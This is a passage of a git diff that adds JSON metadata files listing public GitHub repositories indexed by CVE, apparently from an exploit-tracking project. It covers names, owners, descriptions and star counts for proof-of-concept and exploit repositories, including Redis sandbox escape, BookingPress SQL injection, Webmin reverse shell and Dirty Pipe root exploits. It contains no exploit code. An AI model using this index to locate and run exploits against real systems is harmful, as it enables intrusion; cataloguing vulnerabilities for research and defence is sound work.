"https:\/\/avatars.githubusercontent.com\/u\/96908273?v=4", + "html_url": "https:\/\/github.com\/0x7eTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x7eTeam\/CVE-2022-0543", + "description": "CVE-2022-0543_RCE,Redis Lua沙盒绕过 命令执行", + "fork": false, + "created_at": "2022-03-16T06:41:50Z", + "updated_at": "2024-11-08T09:02:46Z", + "pushed_at": "2024-01-16T03:32:12Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 35, + "watchers": 87, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 510988944, + "name": "CVE-2022-0543", + "full_name": "z92g\/CVE-2022-0543", + "owner": { + "login": "z92g", + "id": 108780847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108780847?v=4", + "html_url": "https:\/\/github.com\/z92g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z92g\/CVE-2022-0543", + "description": "Redis 沙盒逃逸(CVE-2022-0543)POC&EXP", + "fork": false, + "created_at": "2022-07-06T04:35:59Z", + "updated_at": "2024-11-16T19:50:34Z", + "pushed_at": "2022-07-23T14:21:14Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 23, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 531605589, + "name": "CVE-2022-0543", + "full_name": "JacobEbben\/CVE-2022-0543", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-0543", + "description": "Redis RCE through Lua Sandbox Escape vulnerability", + "fork": false, + "created_at": "2022-09-01T16:44:56Z", + "updated_at": "2024-06-04T09:59:22Z", + "pushed_at": "2022-09-02T22:46:08Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 638780954, + "name": "redisHack", + "full_name": "SiennaSkies\/redisHack", + "owner": { + "login": "SiennaSkies", + "id": 105592340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105592340?v=4", + "html_url": "https:\/\/github.com\/SiennaSkies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SiennaSkies\/redisHack", + "description": "redis未授权、redis_CVE-2022-0543检测利用二合一脚本", + "fork": false, + "created_at": "2023-05-10T05:05:31Z", + "updated_at": "2023-05-23T14:22:20Z", + "pushed_at": "2023-05-11T09:23:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0591.json b/2022/CVE-2022-0591.json new file mode 100644 index 0000000000..d75e418e44 --- /dev/null +++ b/2022/CVE-2022-0591.json @@ -0,0 +1,40 @@ +[ + { + "id": 688625677, + "name": "FC3er", + "full_name": "im-hanzou\/FC3er", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/FC3er", + "description": "Automatic Mass Tool for checking vulnerability in CVE-2022-0591 - Formcraft3 < 3.8.28 - Unauthenticated SSRF", + "fork": false, + "created_at": "2023-09-07T18:41:43Z", + "updated_at": "2024-11-21T14:54:22Z", + "pushed_at": "2023-09-07T19:57:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "cve-2022-0591", + "formcraft", + "formcraft3", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0666.json b/2022/CVE-2022-0666.json new file mode 100644 index 0000000000..1940e714c3 --- /dev/null +++ b/2022/CVE-2022-0666.json @@ -0,0 +1,33 @@ +[ + { + "id": 516692900, + "name": "CVE-2022-0666", + "full_name": "keyboardancer\/CVE-2022-0666", + "owner": { + "login": "keyboardancer", + "id": 25246722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25246722?v=4", + "html_url": "https:\/\/github.com\/keyboardancer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keyboardancer\/CVE-2022-0666", + "description": null, + "fork": false, + "created_at": "2022-07-22T09:38:20Z", + "updated_at": "2022-07-22T09:38:20Z", + "pushed_at": "2022-07-22T09:38:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0725.json b/2022/CVE-2022-0725.json new file mode 100644 index 0000000000..b4312d035a --- /dev/null +++ b/2022/CVE-2022-0725.json @@ -0,0 +1,33 @@ +[ + { + "id": 464371159, + "name": "keepass_poc", + "full_name": "ByteHackr\/keepass_poc", + "owner": { + "login": "ByteHackr", + "id": 30409831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30409831?v=4", + "html_url": "https:\/\/github.com\/ByteHackr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ByteHackr\/keepass_poc", + "description": "POC for KeePass [CVE-2022-0725]", + "fork": false, + "created_at": "2022-02-28T06:53:37Z", + "updated_at": "2022-11-03T09:31:10Z", + "pushed_at": "2022-03-12T14:31:02Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0739.json b/2022/CVE-2022-0739.json new file mode 100644 index 0000000000..cba5da93a6 --- /dev/null +++ b/2022/CVE-2022-0739.json @@ -0,0 +1,255 @@ +[ + { + "id": 559657593, + "name": "CVE-2022-0739", + "full_name": "destr4ct\/CVE-2022-0739", + "owner": { + "login": "destr4ct", + "id": 77569644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77569644?v=4", + "html_url": "https:\/\/github.com\/destr4ct", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/destr4ct\/CVE-2022-0739", + "description": "Proof-of-Concept exploit (SQLI BookingPress before 1.0.11)", + "fork": false, + "created_at": "2022-10-30T19:32:15Z", + "updated_at": "2024-01-31T11:11:54Z", + "pushed_at": "2022-10-30T19:38:00Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 560664356, + "name": "CVE-2022-0739", + "full_name": "Chris01s\/CVE-2022-0739", + "owner": { + "login": "Chris01s", + "id": 31475621, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31475621?v=4", + "html_url": "https:\/\/github.com\/Chris01s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chris01s\/CVE-2022-0739", + "description": "Simple bash script to automate the exploit of cve 2022 0739", + "fork": false, + "created_at": "2022-11-02T01:39:37Z", + "updated_at": "2024-08-12T20:28:08Z", + "pushed_at": "2022-11-02T02:18:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 573647044, + "name": "CVE-2022-0739", + "full_name": "BKreisel\/CVE-2022-0739", + "owner": { + "login": "BKreisel", + "id": 1513073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1513073?v=4", + "html_url": "https:\/\/github.com\/BKreisel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BKreisel\/CVE-2022-0739", + "description": "🐍 Python Exploit for CVE-2022-0739", + "fork": false, + "created_at": "2022-12-03T01:33:07Z", + "updated_at": "2023-12-27T12:18:10Z", + "pushed_at": "2022-12-09T18:01:44Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-0739", + "exploit", + "python" + ], + "visibility": "public", + "forks": 0, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 577585825, + "name": "wp_bookingpress_1.0.11", + "full_name": "hadrian3689\/wp_bookingpress_1.0.11", + "owner": { + "login": "hadrian3689", + "id": 71423134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hadrian3689\/wp_bookingpress_1.0.11", + "description": "CVE-2022-0739 Wordpress BookingPress SQLi", + "fork": false, + "created_at": "2022-12-13T04:04:46Z", + "updated_at": "2023-07-06T21:54:38Z", + "pushed_at": "2022-12-13T16:59:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 581412484, + "name": "CVE-2022-0739", + "full_name": "G01d3nW01f\/CVE-2022-0739", + "owner": { + "login": "G01d3nW01f", + "id": 75846902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4", + "html_url": "https:\/\/github.com\/G01d3nW01f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2022-0739", + "description": null, + "fork": false, + "created_at": "2022-12-23T05:35:08Z", + "updated_at": "2022-12-23T05:36:55Z", + "pushed_at": "2022-12-23T05:36:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 586035039, + "name": "CVE-2022-0739", + "full_name": "viardant\/CVE-2022-0739", + "owner": { + "login": "viardant", + "id": 84291326, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84291326?v=4", + "html_url": "https:\/\/github.com\/viardant", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viardant\/CVE-2022-0739", + "description": "Exploit for WP BookingPress (< 1.0.11) based on destr4ct POC.", + "fork": false, + "created_at": "2023-01-06T19:07:11Z", + "updated_at": "2024-07-19T10:23:33Z", + "pushed_at": "2023-01-17T16:02:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 603458874, + "name": "CVE-2022-0739", + "full_name": "ElGanz0\/CVE-2022-0739", + "owner": { + "login": "ElGanz0", + "id": 103381132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103381132?v=4", + "html_url": "https:\/\/github.com\/ElGanz0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ElGanz0\/CVE-2022-0739", + "description": "BookingPress < 1.0.11 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2023-02-18T15:23:49Z", + "updated_at": "2023-02-18T15:24:59Z", + "pushed_at": "2023-02-23T21:49:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616018302, + "name": "Bash-exploit-for-CVE-2022-0739", + "full_name": "lhamouche\/Bash-exploit-for-CVE-2022-0739", + "owner": { + "login": "lhamouche", + "id": 125658579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125658579?v=4", + "html_url": "https:\/\/github.com\/lhamouche", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lhamouche\/Bash-exploit-for-CVE-2022-0739", + "description": null, + "fork": false, + "created_at": "2023-03-19T11:35:03Z", + "updated_at": "2023-09-18T18:30:15Z", + "pushed_at": "2023-03-23T08:20:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0778.json b/2022/CVE-2022-0778.json new file mode 100644 index 0000000000..c7d495f76d --- /dev/null +++ b/2022/CVE-2022-0778.json @@ -0,0 +1,225 @@ +[ + { + "id": 470297034, + "name": "CVE-2022-0778", + "full_name": "drago-96\/CVE-2022-0778", + "owner": { + "login": "drago-96", + "id": 22937313, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22937313?v=4", + "html_url": "https:\/\/github.com\/drago-96", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drago-96\/CVE-2022-0778", + "description": "Proof of concept for CVE-2022-0778, which triggers an infinite loop in parsing X.509 certificates due to a bug in BN_mod_sqrt", + "fork": false, + "created_at": "2022-03-15T19:06:33Z", + "updated_at": "2024-11-21T13:26:19Z", + "pushed_at": "2022-04-03T15:07:31Z", + "stargazers_count": 183, + "watchers_count": 183, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 183, + "score": 0, + "subscribers_count": 17 + }, + { + "id": 477818601, + "name": "cve-2022-0778", + "full_name": "yywing\/cve-2022-0778", + "owner": { + "login": "yywing", + "id": 22928185, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22928185?v=4", + "html_url": "https:\/\/github.com\/yywing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yywing\/cve-2022-0778", + "description": null, + "fork": false, + "created_at": "2022-04-04T18:09:06Z", + "updated_at": "2024-11-16T19:52:29Z", + "pushed_at": "2022-04-07T12:58:46Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 482761729, + "name": "CVE-2022-0778-POC", + "full_name": "jkakavas\/CVE-2022-0778-POC", + "owner": { + "login": "jkakavas", + "id": 10281256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10281256?v=4", + "html_url": "https:\/\/github.com\/jkakavas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jkakavas\/CVE-2022-0778-POC", + "description": null, + "fork": false, + "created_at": "2022-04-18T07:51:18Z", + "updated_at": "2024-11-20T03:08:49Z", + "pushed_at": "2022-04-18T07:55:22Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 483900368, + "name": "CVE-2022-0778", + "full_name": "0xUhaw\/CVE-2022-0778", + "owner": { + "login": "0xUhaw", + "id": 7046734, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7046734?v=4", + "html_url": "https:\/\/github.com\/0xUhaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xUhaw\/CVE-2022-0778", + "description": "Proof of concept for CVE-2022-0778 in P12 and PEM format", + "fork": false, + "created_at": "2022-04-21T04:04:27Z", + "updated_at": "2022-04-26T09:26:47Z", + "pushed_at": "2022-04-22T08:15:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "certificate", + "cve-2022-0778", + "p12", + "pem", + "ssl" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689922616, + "name": "openssl-1.1.1g_CVE-2022-0778", + "full_name": "Trinadh465\/openssl-1.1.1g_CVE-2022-0778", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/openssl-1.1.1g_CVE-2022-0778", + "description": null, + "fork": false, + "created_at": "2023-09-11T07:30:33Z", + "updated_at": "2023-09-11T07:33:47Z", + "pushed_at": "2023-09-11T07:34:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710128947, + "name": "CVE-2022-0778", + "full_name": "jeongjunsoo\/CVE-2022-0778", + "owner": { + "login": "jeongjunsoo", + "id": 75816093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75816093?v=4", + "html_url": "https:\/\/github.com\/jeongjunsoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeongjunsoo\/CVE-2022-0778", + "description": null, + "fork": false, + "created_at": "2023-10-26T04:39:44Z", + "updated_at": "2023-10-26T04:39:44Z", + "pushed_at": "2023-10-26T07:09:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773788494, + "name": "OpenSSL_1.0.1g_CVE-2022-0778", + "full_name": "hshivhare67\/OpenSSL_1.0.1g_CVE-2022-0778", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/OpenSSL_1.0.1g_CVE-2022-0778", + "description": null, + "fork": false, + "created_at": "2024-03-18T12:00:39Z", + "updated_at": "2024-03-18T12:02:10Z", + "pushed_at": "2024-03-18T12:02:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0811.json b/2022/CVE-2022-0811.json new file mode 100644 index 0000000000..0ce0cfdfc7 --- /dev/null +++ b/2022/CVE-2022-0811.json @@ -0,0 +1,33 @@ +[ + { + "id": 472271080, + "name": "webhook-cve-2022-0811", + "full_name": "spiarh\/webhook-cve-2022-0811", + "owner": { + "login": "spiarh", + "id": 33934779, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33934779?v=4", + "html_url": "https:\/\/github.com\/spiarh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/spiarh\/webhook-cve-2022-0811", + "description": "Simple webhook to block exploitation of CVE-2022-0811", + "fork": false, + "created_at": "2022-03-21T09:39:22Z", + "updated_at": "2024-08-12T20:21:44Z", + "pushed_at": "2022-03-21T09:58:35Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0824.json b/2022/CVE-2022-0824.json new file mode 100644 index 0000000000..14930c87fe --- /dev/null +++ b/2022/CVE-2022-0824.json @@ -0,0 +1,142 @@ +[ + { + "id": 466595745, + "name": "Webmin-CVE-2022-0824-revshell", + "full_name": "faisalfs10x\/Webmin-CVE-2022-0824-revshell", + "owner": { + "login": "faisalfs10x", + "id": 51811615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51811615?v=4", + "html_url": "https:\/\/github.com\/faisalfs10x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faisalfs10x\/Webmin-CVE-2022-0824-revshell", + "description": "Webmin <=1.984, CVE-2022-0824 Post-Auth Reverse Shell PoC", + "fork": false, + "created_at": "2022-03-06T00:03:31Z", + "updated_at": "2024-11-25T04:07:38Z", + "pushed_at": "2022-03-06T07:01:15Z", + "stargazers_count": 110, + "watchers_count": 110, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "proof-of-concept", + "vulnerability" + ], + "visibility": "public", + "forks": 38, + "watchers": 110, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 472606012, + "name": "CVE-2022-0824", + "full_name": "honypot\/CVE-2022-0824", + "owner": { + "login": "honypot", + "id": 101309325, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101309325?v=4", + "html_url": "https:\/\/github.com\/honypot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/honypot\/CVE-2022-0824", + "description": "Deployement of Webmin version 1.984 which is vulnerable to authenticated remote code execution exploit.", + "fork": false, + "created_at": "2022-03-22T03:49:51Z", + "updated_at": "2022-12-10T10:21:20Z", + "pushed_at": "2022-04-22T07:51:57Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-0824", + "vulnerability", + "webmin" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552892049, + "name": "golang-webmin-CVE-2022-0824-revshell", + "full_name": "pizza-power\/golang-webmin-CVE-2022-0824-revshell", + "owner": { + "login": "pizza-power", + "id": 6135659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6135659?v=4", + "html_url": "https:\/\/github.com\/pizza-power", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pizza-power\/golang-webmin-CVE-2022-0824-revshell", + "description": "Exploit POC for CVE-2022-0824", + "fork": false, + "created_at": "2022-10-17T11:47:04Z", + "updated_at": "2022-10-18T03:27:54Z", + "pushed_at": "2022-10-17T13:56:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 563421791, + "name": "WebminRCE-exploit", + "full_name": "gokul-ramesh\/WebminRCE-exploit", + "owner": { + "login": "gokul-ramesh", + "id": 65040016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65040016?v=4", + "html_url": "https:\/\/github.com\/gokul-ramesh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gokul-ramesh\/WebminRCE-exploit", + "description": "CVE-2022-0824, CVE-2022-0829, File Manger privilege exploit", + "fork": false, + "created_at": "2022-11-08T15:22:55Z", + "updated_at": "2022-12-12T05:03:39Z", + "pushed_at": "2022-11-18T15:29:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-0824", + "cve-2022-0829", + "exploit", + "webmin-rce", + "webmin-reverse-shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0847.json b/2022/CVE-2022-0847.json new file mode 100644 index 0000000000..222195fac8 --- /dev/null +++ b/2022/CVE-2022-0847.json @@ -0,0 +1,2932 @@ +[ + { + "id": 467159035, + "name": "CVE-2022-0847", + "full_name": "bbaranoff\/CVE-2022-0847", + "owner": { + "login": "bbaranoff", + "id": 37385191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37385191?v=4", + "html_url": "https:\/\/github.com\/bbaranoff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bbaranoff\/CVE-2022-0847", + "description": "CVE-2022-0847", + "fork": false, + "created_at": "2022-03-07T15:50:18Z", + "updated_at": "2024-09-08T18:02:33Z", + "pushed_at": "2022-03-07T15:52:23Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 49, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467200755, + "name": "CVE-2022-0847", + "full_name": "xndpxs\/CVE-2022-0847", + "owner": { + "login": "xndpxs", + "id": 62086766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62086766?v=4", + "html_url": "https:\/\/github.com\/xndpxs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xndpxs\/CVE-2022-0847", + "description": "Vulnerability in the Linux kernel since 5.8", + "fork": false, + "created_at": "2022-03-07T17:51:02Z", + "updated_at": "2024-02-01T01:45:36Z", + "pushed_at": "2022-03-07T17:59:12Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467215742, + "name": "CVE-2022-0847", + "full_name": "r1is\/CVE-2022-0847", + "owner": { + "login": "r1is", + "id": 21257485, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21257485?v=4", + "html_url": "https:\/\/github.com\/r1is", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r1is\/CVE-2022-0847", + "description": "CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”", + "fork": false, + "created_at": "2022-03-07T18:36:50Z", + "updated_at": "2024-11-17T06:56:07Z", + "pushed_at": "2023-02-02T02:17:30Z", + "stargazers_count": 276, + "watchers_count": 276, + "has_discussions": false, + "forks_count": 77, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 77, + "watchers": 276, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 467221382, + "name": "CVE-2022-0847-DirtyPipe-Exploit", + "full_name": "Arinerron\/CVE-2022-0847-DirtyPipe-Exploit", + "owner": { + "login": "Arinerron", + "id": 3926753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3926753?v=4", + "html_url": "https:\/\/github.com\/Arinerron", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arinerron\/CVE-2022-0847-DirtyPipe-Exploit", + "description": "A root exploit for CVE-2022-0847 (Dirty Pipe)", + "fork": false, + "created_at": "2022-03-07T18:55:20Z", + "updated_at": "2024-11-16T06:35:35Z", + "pushed_at": "2022-03-08T06:20:05Z", + "stargazers_count": 1092, + "watchers_count": 1092, + "has_discussions": false, + "forks_count": 218, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 218, + "watchers": 1092, + "score": 0, + "subscribers_count": 17 + }, + { + "id": 467240173, + "name": "CVE-2022-0847", + "full_name": "2xYuan\/CVE-2022-0847", + "owner": { + "login": "2xYuan", + "id": 101141051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101141051?v=4", + "html_url": "https:\/\/github.com\/2xYuan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/2xYuan\/CVE-2022-0847", + "description": "66666", + "fork": false, + "created_at": "2022-03-07T19:56:37Z", + "updated_at": "2022-03-20T07:34:45Z", + "pushed_at": "2022-03-07T19:56:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467257098, + 